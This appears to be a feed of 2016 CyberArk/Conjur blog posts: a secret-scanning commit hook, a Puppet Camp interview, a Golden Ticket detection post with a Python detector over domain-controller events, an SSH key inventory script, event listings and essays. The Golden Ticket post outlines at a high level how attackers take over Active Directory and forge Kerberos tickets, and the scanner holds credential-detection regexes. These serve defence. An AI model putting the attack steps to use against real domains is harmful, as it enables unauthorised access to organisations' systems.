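    ("aws-access-key-id", re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")),
    # AWS secret keys: 40 base64-ish characters assigned to a secret-key name.
    ("aws-secret-key", re.compile(
        r"(?i)aws[_-]?secret[_-]?(?:access[_-]?)?key\W{0,4}([A-Za-z0-9/+=]{40})")),
    # Any password/secret/token assigned a quoted literal of 8+ characters.
    ("hardcoded-secret", re.compile(
        r"(?i)(?:password|passwd|secret|token)\s*[:=]\s*['\"]([^'\"]{8,})['\"]")),
]

# Values that are clearly not real secrets (templates, env references, dummies).
PLACEHOLDER = re.compile(
    r"(?i)^(?:x+|changeme|example|placeholder|<[^>]+>|\$\{[^}]+\}|\$[A-Z_]+)$")


def scan_text(path: str, text: str) -> List[Finding]:
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if "# nosecret" in line:  # explicit, reviewable allowlist marker
            continue
        for rule, pattern in RULES:
            m = pattern.search(line)
            if not m:
                continue
            value = m.group(1) if m.groups() else m.group(0)
            if PLACEHOLDER.match(value):
                continue
            findings.append(Finding(path, line_no, rule, value[:4] + "..."))
            break  # one finding per line is enough to block the commit
    return findings


def scan_files(files: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of path -> file contents (e.g. the staged files in a hook)."""
    return [f for path, text in sorted(files.items()) for f in scan_text(path, text)]


# Constructed sample input: two files as they might appear in a commit.
SAMPLE_FILES = {
    "config.py": (
        'AWS_ACCESS_KEY_ID = "AKIATESTTESTTESTTEST"\n'
        'AWS_SECRET_ACCESS_KEY = "TestSecretKeyValueThatIsFortyCharsLong00"\n'
        'db_password = os.environ["DB_PASSWORD"]\n'   # correct: read at runtime
        'smtp_password = "changeme"\n'                # placeholder, not flagged
    ),
    "deploy.sh": (
        'export API_TOKEN="tok-0123456789abcdef"\n'
        'token="${API_TOKEN}"\n'                      # env reference, not flagged
    ),
}

if __name__ == "__main__":
    findings = scan_files(SAMPLE_FILES)
    for f in findings:
        print(f"{f.path}:{f.line_no}: {f.rule} ({f.masked})")
    raise SystemExit(1 if findings else 0)  # non-zero exit blocks the commit
```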


]]>
All About Puppet Camps with Grace Stillar https://www.cyberark.com/blog/all-about-puppet-camps-with-grace-stillar/ Wed, 02 Mar 2016 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/all-about-puppet-camps-with-grace-stillar/  

Puppet Camp Q&A with Grace Stillar

Here at Conjur, we are big fans of Puppet. Together, Puppet and Conjur help organizations automate and go fast while staying in control with a clear audit trail.

Our love of Puppet explains why we are super excited to attend Puppet Camps Dallas on March 22. Puppet Camps are one-day events during which you can watch presentations delivered by prominent members of the community as well as connect with other users in the area.

Wanting to get a better understanding of all that Puppet Camps has to offer, I recently sat down with Grace Stillar, Events Marketing Coordinator at Puppet Labs, to ask her some questions about the community events.

Q: What makes Puppet Camps stand out?

A:  What stands out about Puppet Camps is that they focus on local users teaching other users how they’ve been integrating Puppet and what works versus what doesn’t. We do around 30 Puppet Camps a year around the world, and for every event the talks are different and based upon that region’s needs. It’s not just pulling one or two folks up on stage, but it’s five or six different talks from users, combined with supporting presentations from Puppet employees. The purpose of Camps is for Puppet to build a space where local users, Open Source and Enterprise alike, can learn from one another.

Q: What can attendees expect to take away from Puppet Camps?

A: Camps are a really good opportunity for folks who are getting started with Puppet to see the variety of ways in which Puppet can be used, and head back to work with a better understanding of what they’re capable of implementing into their infrastructure. Very frequently, attendees mention that they learn about people in their region who are using Puppet and are able to build local relationships with them. Aside from the learning aspect of Camps, one thing we frequently hear from attendees is that they hear a lot about who else in their region is using Puppet and are able to build local relationships that last outside of the event itself. There’s a Puppet User Group (PUG) in most major cities, and a lot of those conversations continue throughout the year.

Q: I’m a beginner with Puppet, am I too inexperienced to attend Puppet Camps? What is the average experience level of attendees?

A: Not at all! Puppet Camps are deliberately designed towards adhering to the beginner user. So many folks are adopting Puppet right now, and it’s important that there’s a place for beginners to strengthen their understanding of what they’re capable of doing with Puppet. All the talks at Puppet Camps are technical talks geared towards the practitioner or IT Manager, so even when more intermediate level content comes up, beginners are seeing actual examples of what is possible to do with Puppet.

Q: What is your favorite part of the Puppet Camp community?

A: The connections that are made at Puppet Camps are always delightfully surprising in that we’ll see folks who worked together in the past meeting again and finding out they have a middle ground with both using Puppet, folks who work at the same company in different divisions and weren’t aware of one another’s existence, and new connections between folks who are solving similar problems with their infrastructures. These small connections in the context of a larger event are some of the most beneficial in the long term. 

Q: If an organization wants to speak at Puppet Camp what is your advice in terms of the content they present?

A: Puppet Camps are a great opportunity to share what you’ve learned about Puppet with others, or show the interesting ways you’re using it. Puppet Camp talks are technical, practitioner-focused, and at least 50% about Puppet. We do our best to avoid marketing pitches, while aiming to book talks that are valuable for someone that is looking to use Puppet or is using it today.

Q: What is the funniest/craziest thing that has ever happened at Puppet Camps?

A: We strive to hold Camps in interesting and unique locations, such as museums, theaters, art galleries, co-working spaces, and more. This helps keep things fresh and interesting for us and for attendees. In one instance, we were in a museum theater where we had to work around an archaic AV system by having our demo presenters type on their laptops from the theater soundbooth at the back of the audience. This meant some of the sessions appeared to have no one actually delivering the presentations, but featured a booming voice accompanying the scrolling Puppet code. In another instance we were holding a camp in an art gallery and, in order to set up a camera to record the talks, we had to climb a ladder to an internal treehouse! All to say, we like to be kept on our toes, and we always make Camps memorable experiences for the employees and attendees alike.


]]>
Detect, Alert and Respond with CyberArk Privileged Threat Analytics https://www.cyberark.com/blog/detect-alert-respond-cyberark-privileged-threat-analytics-2/ Tue, 01 Mar 2016 15:07:16 +0000 https://www.cyberark.com/blog//

How do advanced cyber attackers find their way to the heart of your enterprise? In 80 to 100 percent of attack sequences, the preferred pathway is the privileged account, as we’ve seen time and again in high-profile breaches from Sony Pictures to the Office of Personnel Management (OPM).

Once inside the network, attackers make moves to steal credentials, move laterally, and escalate privileges to gain access to their target. Along this path, attackers often seek domain administrator credentials to ultimately gain control of Active Directory (AD). Once an attacker has control of AD, the entire organization is in the attacker’s hands.

With access to a domain controller, an attacker can execute a Golden Ticket attack and generate Kerberos tickets. This enables an attacker to achieve unauthorized, and often, unfettered access to the enterprise environment – all while staying completely under the radar by impersonating authorized users. This stealthy impersonation strategy creates numerous challenges for organizations trying to detect and respond to in-progress attacks on the network. Not only can these attacks be incredibly catastrophic to an organization, but they can occur very quickly.

To mitigate the risks of a serious breach, organizations must adopt a security posture that addresses privileged account exposure with multiple layers of protection including proactive controls AND threat detection. Today, we’ve announced new product features that enable organizations to secure the Active Directory infrastructure with proactive controls and threat detection capabilities, available on a single platform.

CyberArk Privileged Threat Analytics 3.0 is a security intelligence solution that detects, alerts and responds to anomalous privileged activity indicating an in-progress attack – including Kerberos attacks. By focusing analytics only on privileged activity instead of analyzing everything on the IT network, CyberArk Privileged Threat Analytics delivers targeted, prioritized alerts on the most critical malicious activity.

Here is an example of Privileged Threat Analytics in-action as it detects a Kerberos Golden Ticket Attack – one of the most severe and damaging attack methods used today:

CyberArk Dashboard: This visual representation of detected incidents over time shows a detected Golden Ticket attack. Critical information such as the malicious user and machine are provided on the dashboard; security analysts can drill-down to get more detailed information on all security incidents.

CyberArk Privileged Threat Analytics can detect in-progress Kerberos attacks by analyzing network traffic and identifying deterministic indications of compromise. With the potential to cause significant damage, these attacks must be detected quickly and responded to immediately. If CyberArk Privileged Threat Analytics detects a Golden Ticket attack, the security team will receive a prioritized alert that is automatically assigned the highest risk score possible, empowering incident response teams to respond immediately. Furthermore, credentials can be automatically rotated to contain the incident and limit the moves of a suspected attacker.
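To make the idea of “deterministic indications of compromise” concrete, here is an added example (not CyberArk’s detection logic) that applies two widely cited Golden Ticket indicators to domain controller security events: a service ticket request (event 4769) with no preceding TGT request (event 4768) from the same client within the TGT lifetime, and a ticket presented for an account that does not exist in the directory. The events, account list, and 10-hour lifetime (Active Directory’s default policy) are assumptions constructed for the example.

```python
"""Detect indicators of a forged Kerberos TGT (Golden Ticket) in DC security events.

Added example, not CyberArk's detection logic. Indicators used:
  1. a service ticket request (4769) for which no TGT request (4768) from the
     same client was seen within the TGT lifetime (a forged TGT never went
     through the KDC's AS exchange);
  2. a ticket for an account that does not exist in the directory.
All events below are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Set, Tuple

TGT_REQUEST = 4768             # "A Kerberos authentication ticket (TGT) was requested"
SERVICE_TICKET_REQUEST = 4769  # "A Kerberos service ticket was requested"
# Assumed maximum TGT lifetime; Active Directory's default policy is 10 hours.
TGT_LIFETIME = timedelta(hours=10)


@dataclass
class Alert:
    account: str
    client: str
    service: str
    reasons: List[str]
    severity: str = "critical"  # a forged TGT warrants the highest priority


def detect_golden_ticket(events: Iterable[dict], known_accounts: Set[str],
                         tgt_lifetime: timedelta = TGT_LIFETIME) -> List[Alert]:
    """Return one Alert per suspicious service ticket request.

    Each event is a dict with keys ts (ISO 8601), event_id, account, client
    and, for 4769, service. Events may arrive unsorted.
    Caveat: feed in 4768 events from every DC in the domain; a TGT issued by
    a DC whose logs are not collected would otherwise look forged.
    """
    last_tgt: Dict[Tuple[str, str], datetime] = {}
    alerts: List[Alert] = []
    known = {a.lower() for a in known_accounts}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        key = (ev["account"].lower(), ev["client"])
        if ev["event_id"] == TGT_REQUEST:
            last_tgt[key] = ts  # the KDC issued this client a TGT legitimately
            continue
        if ev["event_id"] != SERVICE_TICKET_REQUEST:
            continue
        reasons = []
        issued = last_tgt.get(key)
        if issued is None or ts - issued > tgt_lifetime:
            reasons.append("no TGT request (4768) from this client within the TGT lifetime")
        if key[0] not in known:
            reasons.append("account does not exist in the directory")
        if reasons:
            alerts.append(Alert(ev["account"], ev["client"], ev.get("service", ""), reasons))
    return alerts


# Constructed sample: one legitimate flow (alice) and three suspicious requests.
KNOWN_ACCOUNTS = {"alice", "bob", "administrator"}
SAMPLE_EVENTS = [
    {"ts": "2016-03-01T08:00:00", "event_id": 4768, "account": "alice", "client": "10.1.1.20"},
    {"ts": "2016-03-01T08:00:05", "event_id": 4769, "account": "alice", "client": "10.1.1.20",
     "service": "cifs/fileserver"},
    # Service ticket for a privileged account with no TGT request from this client.
    {"ts": "2016-03-01T09:10:00", "event_id": 4769, "account": "Administrator",
     "client": "10.1.1.77", "service": "ldap/dc01"},
    # Account that is not in the directory at all.
    {"ts": "2016-03-01T09:12:00", "event_id": 4769, "account": "svc_legacy",
     "client": "10.1.1.77", "service": "cifs/dc01"},
    # TGT seen, but 13.5 hours earlier: beyond the assumed lifetime.
    {"ts": "2016-02-29T20:00:00", "event_id": 4768, "account": "bob", "client": "10.1.1.30"},
    {"ts": "2016-03-01T09:30:00", "event_id": 4769, "account": "bob", "client": "10.1.1.30",
     "service": "cifs/fileserver"},
]

if __name__ == "__main__":
    for a in detect_golden_ticket(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"[{a.severity}] {a.account} from {a.client} -> {a.service}: {'; '.join(a.reasons)}")
```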

To learn more about CyberArk Privileged Threat Analytics and recommendations for detecting, alerting and responding to the most critical cyber attacks that could significantly impact your business, please check out the free resources listed below. If you’re in San Francisco this week for the RSA Conference (#RSAC), stop by the CyberArk booth N4301 in the North Expo Center. I’d be happy to give you a demo.

Resources:


]]>
6 Things Security Architects Can Learn from the Presidential Election https://www.cyberark.com/blog/6-things-security-architects-can-learn-from-the-presidential-election/ Tue, 01 Mar 2016 18:01:00 +0000 https://cyberarkvx2.wpengine.com/blog/6-things-security-architects-can-learn-from-the-presidential-election/  

In honor of Super Tuesday, we thought it would be a good idea to take a look at the election process thus far and see what today’s presidential candidates can teach us about communicating with a team. Whether you’re a conservative, liberal, or somewhere in between, there are some clear takeaways you can garner from these campaigns, as this election is a perfect example of both effective, and ineffective, communication. For security architects, a main struggle is getting development on board with your security plan. Since communication is crucial to achieving this enterprise-wide focus on security, why not take some tips from some of the best, and worst, orators in the business?

1) Listen

In order to gain support, politicians need to listen to the people in order to truly understand the plight of the constituent. They also need to actively listen in debates so that they can adequately speak to the points made by their fellow candidates. As a security architect, you have to listen to the development team in order to understand why they don’t want to think about security, or what they are worried about happening if a new security plan is introduced.

Learn what tools they like to use, and make sure whatever plan you create integrates well with the things they use everyday. If your plan is crafted around the issues developers voice, it will be a lot easier to get them on board.

2) Have a Plan

Every politician has a plan for how they intend to make things better. If this strategy isn’t well thought out and doesn’t address the concerns of constituents, they will lose voter credibility and confidence. When you introduce a new plan to the organization make sure it is well thought out and easy to understand, that way you will be able to effectively establish your point and clearly answer questions.

Think ahead and make sure your plan addresses the main apprehensions of developers. Be sure to create a program that outlines how important security is to the entire enterprise, the vast impact it has on the business, and how imperative it is that security be woven into the development process.

3) Don’t over-promise

Just as politicians shouldn’t bait voters, you shouldn’t mislead the development team. It can be tempting to say the new processes you are introducing will be easy to implement and understand; these hopeful misrepresentations are especially appealing when you are trying to get developers to agree to the new security plan you are proposing. However, over-promising won’t build good faith.

Be honest about the new process and make it clear that you and your team will be there, every step of the way, to ensure implementation goes as smoothly as possible and to answer all questions.

4) Give an accurate timeline

Politicians always present key issues as their chief concern and the first thing they will address when they are elected. However, this is rarely the case, causing a great deal of frustration and lack of trust. Be honest with the development team about how long the new plan will take to implement and how much additional time it will tack on to their day-to-day innovation. Make it clear that security is vital to the health of the enterprise and that their participation and enthusiasm are key to the organization’s success.

5) No Yelling!

Although it’s easy to make snap judgments and yell when you feel your point is not being heard, keep in mind that security is a company wide issue, and every team has their own set of objectives. Although you realize security is important, not everyone will agree with you. The only truly effective way to get others to understand your point is to speak clearly and concisely. Answer questions, speak truthfully, and encourage an open dialogue amongst participants. Take their concerns and address them honestly. Shouting does not make for productive conversations, it causes listeners to put up barriers, and it creates counterproductive animosity that will only make your job as a security professional harder.

6) Don’t Let Your Ego Get in the Way

(Pretty self-explanatory; we all know politicians have some big egos.) Yes, you put a lot of thought into the security plan you created; however, there are always better ways to do things. Understand that plans are iterative, and although the security plan you created was well thought out, there are always holes that need to be filled or things that simply don’t work in practice. Continually collect data and re-evaluate your proposal, noticing what is working and what isn’t, taking feedback from your team, and making the processes better.

Getting the enterprise to put security first can be tricky. However, with a clear plan and effective communication, it is possible.


]]>
Conjur to Present as SSH Cloud Partner at RSA Conference https://www.cyberark.com/blog/conjur-to-present-as-ssh-cloud-partner-at-rsa-conference/ Mon, 29 Feb 2016 13:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-to-present-as-ssh-cloud-partner-at-rsa-conference/  

Press Release:

Conjur and SSH will showcase a combined solution that allows customers to extend access management visibility and control beyond the datacenter

WALTHAM, Mass. – Feb. 29, 2016 – Conjur, Inc., provider of Automated Access Management software, will be showcasing their integration with partner SSH Communications Security, the inventor of the SSH protocol, at the 2016 RSA Conference February 29-March 4 at the Moscone Center in San Francisco. This new solution offered by SSH allows teams to extend their existing investments in monitoring, centralized management and access control to new environments and new categories of identities emerging from the adoption of IT automation and cloud services.

Working together, SSH and Conjur will provide customers with a unified model for managing cloud privileged identities and shared service accounts that leverages SSH’s monitoring and credential management. Additionally, the partnership delivers a combined approach to meeting compliance and audit requirements for sessions beyond the on-premise datacenter.

“We have seen consistent interest from our customers in extending what are standard operating practices around access control in their on-premise datacenters to the cloud. Conjur’s integration with SSH’s monitoring and SSH key management system is intended to do just that,” said Elizabeth Lawler, CEO and co-founder at Conjur. “The RSA conference is an ideal place to share our hybrid-cloud solution. This approach ensures that cloud infrastructure and IT automation technologies will have the same level of security and control as more traditional IT environments. By extension of the on-prem system, enterprises will be able to manage access control at an entirely greater scale, velocity and efficiency, without sacrificing the security and accountability they require.”

The SSH and Conjur integrated solution will be available for demonstration at the SSH booth. Conjur CEO Elizabeth Lawler and VP Josh Bregman will be in the South Expo hall, at booth #1341, meeting with customers, delivering demos, exchanging ideas and discussing all the benefits of the SSH and Conjur partnership.

About Conjur
For enterprises that need to protect their infrastructure, Conjur provides proactive security with comprehensive authorization for every cloud, VM, container, service, job and user. Conjur helps companies such as Netflix, Box, and Puppet Labs solve critical operational, compliance, and security challenges that originate in modern automated infrastructure. Headquartered in Waltham, Massachusetts, Conjur is funded by Avalon Partners and Amplify Partners. Visit www.conjur.net and follow @conjurinc on Twitter.

PR Contact:
Tracy Wemett
BroadPR
+1-617-868-5031
All trademarks recognized.


]]>
7 Sessions You Must See at RSA 2016 https://www.cyberark.com/blog/7-sessions-you-must-see-at-rsa-2016/ Fri, 26 Feb 2016 19:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/7-sessions-you-must-see-at-rsa-2016/  

Must See Sessions at RSA 2016

Going to RSA? While you’re navigating your way around the Moscone Center, it can be difficult to figure out where to go or which sessions you should attend. With hundreds of interesting and informative sessions, conducted by industry experts, how can you choose? Although you’ll get some fantastic takeaways from any session you select, we’ve picked 7 sessions we think will be particularly interesting.

Take It to the Cloud: The Evolution of Security Architecture

Monday, February 29, 2016; 3:00 PM – 3:50 PM; Room 3018W

Led by Dana Wolf, Head of Products at Open DNS, this session covers the new risks associated with SaaS/IaaS adoption and how to diminish these uncertainties using new approaches to security architecture.

DevOps Throw Down with Chris, Gary, Caleb and Shannon

Tuesday, March 1, 2016; 2:20 PM – 3:10 PM; Room 3006W

This session boasts a panel of experts from Intuit, Bluebox Security, Veracode, and Cigital who discuss DevOps in the real world and what it actually delivers.

From Pigtails, to Prom, to a Cyber-Career: What about Your Daughter?

Tuesday, March 1, 2016; 1:10 PM – 2:00 PM; Room 130N

Deidre Diamond, founder and CEO of Cyber Security Network, will discuss the lack of females in cybersecurity and how we can change our viewpoints on IT careers to foster a stronger female presence going forward.

Is Automation the Answer for Security in the Digital World?

Tuesday, March 1, 2016; 2:20 PM – 3:10 PM; Room 2017W

Bret Hartman, VP and CTO at Cisco, will talk about the new security requirements that have emerged from the IoT and whether or not automation of security will help diminish these threats, or make them worse.

Automobiles are Getting Hacked: What’s Next for Transportation Security?

Tuesday, March 1, 2016; 2:20 PM – 3:10 PM; Room 3004W

Experts from ICIT, IOActive, Venable, and General Motors Company discuss the Jeep recall, vehicle connectivity, the issues it creates, and proposed improvements.

Product Security at Internet Scale

Tuesday, March 1, 2016; 1:10 PM – 2:00 PM; Room 3006W, or Thursday, March 3, 2016; 11:30 AM – 12:20 PM; Room 2001W

Michael Murray of Lookout Mobile Security will consider recent data breaches and examine the security of some of the world’s biggest products that contain caches of valuable data, discerning key takeaways from these examples.

Security Issues in Transportation: Need for Collaboration for Solutions

Wednesday, March 2, 2016; 1:00 PM – 1:50 PM; Room 3014W

Joshua Corman and Kurt Baumgartner investigate research on IoT and car hacking, attack vectors for exploitation of transportation systems, and the need for the automotive industry and cybersecurity to work together.

Plan to attend a session that isn’t on our list? Let us know; we will add it to our schedule and check it out! If the session you plan to attend is full, no worries: head to booth #1341 in the South Expo Hall and say hello to your friends over here at Conjur. In a packed expo hall, who doesn’t love seeing a friendly face?


]]>
IDC: Organizations Can’t Afford to Overlook SSH Keys https://www.cyberark.com/blog/idc-organizations-cant-afford-overlook-ssh-keys/ Thu, 25 Feb 2016 13:51:19 +0000 https://www.cyberark.com/blog//

It’s no secret that privileged accounts are exploited in the vast majority of advanced cyber attacks, and these advanced attacks are becoming more and more common. In fact, according to a survey by IDC*, almost 80% of Chief Information Security Officers (CISOs) have had to notify their executive teams of a significant breach.

Yet, as organizations work to better secure their organizations and reduce the privileged account attack surface, Secure Shell (SSH) keys – which provide privileged and often root access to Unix and Linux systems – are often overlooked. According to a new IDC Market Spotlight, “Minimizing Cybersecurity Risk with Vigilant SSH Key Management,” organizations that leave their SSH keys unsecured and unmanaged may inadvertently be providing attackers with complete and undetected access to sensitive data and critical assets.

While many IT security teams presume that the SSH protocol alone is enough to secure access to their sensitive systems, this rationale can create significant risks. As the IDC Market Spotlight points out, just like privileged passwords, “SSH keys can either serve to protect important data or become virtual skeleton keys unlocking the entirety of an organization’s assets.” The only way to ensure the former is to properly secure and manage these privileged credentials.

According to IDC, there are four ways in which organizations often mismanage SSH keys, potentially opening up the organization to a serious breach:

  1. Lack of visibility into SSH keys. SSH keys are often only known to those who create and use them. As a result, many members of the security and risk management teams may be entirely unaware of the SSH key-based privileged access that exists in their environment.
  2. Frequent key sharing between users and systems. Because most SSH key users independently manage their keys, without the help of any tools, SSH keys often become replicated across systems and shared among teams. As a result, it can be incredibly difficult for security and audit teams to clearly track who did what and when.
  3. Manual (if any) key rotation processes. Though most IT administrators understand the importance of credential rotation and revocation, when done manually this process can be difficult, time-consuming and operationally high risk. If individual keys are accidentally overlooked, the consequences can range from inconvenient user lockouts to major system outages. Yet if SSH keys are left static, an attacker could use a compromised key to gain persistent privileged access to sensitive enterprise resources.
  4. Embedding keys into applications – and forgetting about them. SSH keys are often embedded by developers into applications and scripts to automate authentication. While this helps streamline processes, these keys are often either forgotten about or intentionally left static to avoid the risk of a system outage, should a key be missed in the manual rotation process. Yet, if compromised, an attacker could use these credentials to access critical systems and laterally move through the environment.

To effectively manage the risks associated with SSH keys, IDC recommends that organizations consider automated SSH key management solutions. A centralized solution can help organizations locate existing SSH keys to identify unexpected SSH connections, secure private SSH keys with access controls and strong authentication, rotate key pairs throughout the environment, and audit the use of SSH keys to more easily determine who did what with which key. By strengthening security in an automated way, organizations can better protect their sensitive assets while avoiding the operational risks associated with manual key rotation. In addition, the detailed audit trail provided by SSH key management solutions can help organizations comply with regulatory standards, such as PCI DSS 3.0, and accelerate incident investigation and response times.
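The first two problems IDC lists, no visibility and keys shared across users and systems, both start with an inventory: which public keys are trusted by which account on which host. The following added example (not the IDC report’s or CyberArk’s tooling) parses authorized_keys contents collected from several accounts, computes OpenSSH-style SHA256 fingerprints, and reports keys trusted by more than one principal. The key blobs are constructed and syntactically valid but are not real keys.

```python
"""Inventory SSH public keys across hosts and accounts; flag keys shared between
principals.

Added example, not the IDC report's or CyberArk's tooling. Input is a mapping of
"host:user" -> contents of that account's authorized_keys file. The keys below
are constructed, syntactically valid ssh-ed25519 blobs, not real keys.
"""
import base64
import hashlib
import struct
from collections import defaultdict
from typing import Dict, Iterator, List, NamedTuple, Tuple

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ssh-dss",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


class KeyEntry(NamedTuple):
    principal: str   # "host:user"
    key_type: str
    options: str     # leading options field, e.g. command="...",from="..."
    comment: str


def ssh_fingerprint(blob_b64: str) -> str:
    """OpenSSH-style fingerprint: SHA256 of the raw key blob, base64 without padding."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> Iterator[Tuple[str, str, str, str]]:
    """Yield (options, key_type, blob, comment) per key line.

    The optional leading options field may contain quoted values with spaces,
    so it is split off by scanning for the first unquoted whitespace.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        options = ""
        if line.split(None, 1)[0] not in KEY_TYPES:
            i, in_quote = 0, False
            while i < len(line):
                c = line[i]
                if c == '"' and (i == 0 or line[i - 1] != "\\"):
                    in_quote = not in_quote
                elif c.isspace() and not in_quote:
                    break
                i += 1
            options, line = line[:i], line[i:].strip()
        parts = line.split(None, 2)
        if len(parts) < 2 or parts[0] not in KEY_TYPES:
            continue  # malformed line; surface these separately in a real audit
        yield options, parts[0], parts[1], (parts[2] if len(parts) == 3 else "")


def inventory(authorized_keys: Dict[str, str]) -> Dict[str, List[KeyEntry]]:
    """Map each key fingerprint to every principal that trusts it."""
    inv: Dict[str, List[KeyEntry]] = defaultdict(list)
    for principal, text in sorted(authorized_keys.items()):
        for options, key_type, blob, comment in parse_authorized_keys(text):
            inv[ssh_fingerprint(blob)].append(KeyEntry(principal, key_type, options, comment))
    return dict(inv)


def shared_keys(inv: Dict[str, List[KeyEntry]]) -> Dict[str, List[str]]:
    """Keys trusted by more than one principal: one private key opening many doors."""
    return {fp: sorted({e.principal for e in entries})
            for fp, entries in inv.items() if len({e.principal for e in entries}) > 1}


def _constructed_ed25519_blob(seed: str) -> str:
    """Wire-format ssh-ed25519 blob (string "ssh-ed25519" + 32 bytes) built from a
    seed. CONSTRUCTED test data only; the 32 bytes are not a real public key."""
    key = hashlib.sha256(seed.encode()).digest()
    wire = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + key
    return base64.b64encode(wire).decode()


K_ALICE = _constructed_ed25519_blob("alice-laptop")
K_DEPLOY = _constructed_ed25519_blob("deploy-shared")

# Constructed sample: the same deploy key trusted by three accounts on two hosts.
SAMPLE = {
    "web01:alice": f"ssh-ed25519 {K_ALICE} alice@laptop\n",
    "web01:deploy": f'command="/usr/local/bin/deploy --env prod",from="10.0.0.5" '
                    f"ssh-ed25519 {K_DEPLOY} deploy\n",
    "db01:root": f"# legacy entry\nssh-ed25519 {K_DEPLOY} deploy\n",
    "db01:app": f"ssh-ed25519 {K_DEPLOY}\n",
}

if __name__ == "__main__":
    inv = inventory(SAMPLE)
    for fp, entries in inv.items():
        print(fp, [e.principal for e in entries])
    for fp, principals in shared_keys(inv).items():
        print("SHARED", fp, principals)
```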

Download the IDC Market Spotlight to learn more about how to minimize SSH key risks, and visit the CyberArk SSH Key Manager webpage to learn how CyberArk solutions can help you secure SSH keys, rotate key pairs and better protect your sensitive assets.

*Source: The State of the “C” in CISO, doc #254283, February 2015

]]>
8 Books Every Security Architect Must Read https://www.cyberark.com/blog/8-books-every-security-architect-must-read/ Thu, 25 Feb 2016 17:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/8-books-every-security-architect-must-read/  

We are always trying to get better at our jobs. Although we can’t put a price on the real, hands-on experience of practice, implementation, and conversations, sometimes we need to rely on additional perspectives to paint a more complete picture.

Experts in the field of security architecture have created some great resources based on their years of learning, calling on both their successes and mishaps in crafting these helpful narratives. Although we aren’t big on “hacks” here at Conjur, as we are firm believers that putting in more work on a project will produce better results, an easy way to “hack” learning so you don’t have to go back for another advanced degree, is to read books that others have spent lifetimes creating.

So, if you’re looking to expand your horizon, absorb some expert knowledge, and crack open a book (or at least skim it), here are 8 stellar picks that every security architect can appreciate.

1. Security Engineering by Ross Anderson

This book teaches readers how to create systems that remain dependable in the face of error or malice, especially in the wake of the latest, more advanced security threats.

2. Designing Security Architecture Solutions by Jay Ramachandran 

This book dives into system security architecture from a software engineering point of view. The author explains that strong security must be a major principle, and have great impact, in the development cycle.

Must Reads for Security Architects

3. Security Metrics: Replacing Fear, Uncertainty, and Doubt by Andrew Jaquith

A Yankee Group Security Expert, Andrew Jaquith teaches readers how to craft proper security metrics based on their organization’s distinctive requirements. The piece is filled with the best practices to help security architects define, create, and utilize security metrics in the enterprise.

4. Software Systems Architecture: Working With Stakeholders Using Viewpoints and Perspectives by Nick Rozanski and Edin Woods

Focused on the practitioner and ideal for beginners, this guide helps readers compose and administer effective architectures for information systems.

5. Working Effectively with Legacy Code by Michael Feathers

Using relevant and realistic examples, this book helps practitioners to work through the messy problems that accompany legacy code.

6. Beyond Software Architecture: Creating and Sustaining Winning Solutions By Luke Hohmann

Unlike other books on the shelves, this piece deals with the business and project management aspects of software architecture.

7. Software Architecture in Practice by Len Bass, Paul Clements, and Rick Kazman

Structured around the idea of an architecture influence cycle, this book shows the different contexts (such as the technical environment, the life cycle of a project, an organization’s business profile, or the architect’s professional practices) in which architecture is influenced or is the influencer.

8. Security Risk Management: Building an Information Security Risk Management Program from the Ground Up by Evan Wheeler

This book focuses on real-world, practical information and techniques that can be applied on a daily basis in managing security risks.

Read any of these books or have another that you recommend? Let us know!


]]>
Security, Agility, and Accountability: A Balancing Act https://www.cyberark.com/blog/security-agility-and-accountability-a-balancing-act/ Wed, 24 Feb 2016 15:26:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-agility-and-accountability-a-balancing-act/  

Many experts in the IT field believe that the battle inside the enterprise between developers, security, and compliance officers will de-escalate. However, at Conjur, we believe this issue is a complex one and is beyond the solution of simply finding common ground. The challenge is discovering the balance between accountability and agility, and the security tools that can enable and sustain that balance.

Balancing Security, Compliance, and Developers

An effective model for cross-functional governance, risk management, and compliance must span not only IT automation tools like Puppet and Chef but also cloud services, such as AWS and Azure, in order to extend across the software delivery pipeline. In practical terms, this involves specific capabilities like managed access by developers to the AWS Administrator Console to assign resources for code moving into production, as well as programmatic integration of protected secrets into source control workflows for IT automation. Too many times, enterprises are stuck in an “all or nothing” predicament, where either developer velocity wins out or security becomes the bottleneck.

Into the Unknown

The challenge that security and compliance teams face is not just expanding the scope of controls and visibility to new infrastructure in the form of IT automation and cloud services, but also how to apply security principles, notably authorization, to processes that break new ground. Addressing security for IT automation requires security teams to rethink how they can facilitate new software delivery processes in a risk-driven, repeatable model.

How to Establish a Consensus on Risk & Compliance

As the name implies, DevOps models compel developers and IT operations to cooperate seamlessly and operate in sync. Platforms and tools like Puppet enable this type of tighter symbiosis through capabilities like source control, and drive mutual benefit through patterns like ‘infrastructure as code’. Folding security into the mix is critical to high-performing DevOps teams, according to Puppet Labs’ report on the State of DevOps in 2015. However, it’s one of the reasons that many larger enterprises are hesitant to embrace IT automation: it implies a change in process and cross-functional cooperation.

From an operational perspective, then, security and developer teams are looking for ways to establish a consensus on risk and compliance, and then implement that consensus in a repeatable, transparent model, rather than cobble together multiple components with varying degrees of support and institutional knowledge.

Trust, But Validate

Conjur’s approach is to use a tiered authorization model specifically to facilitate a consensual process for balancing access, risk management, compliance, and agility based on enterprise business needs. Through a transparent and easily edited policy framework, the Conjur role-based authorization platform is designed to enable enterprises to centrally define policies on who (or what, in the case of IT automation workflows) gets access to what, and with what permissions.

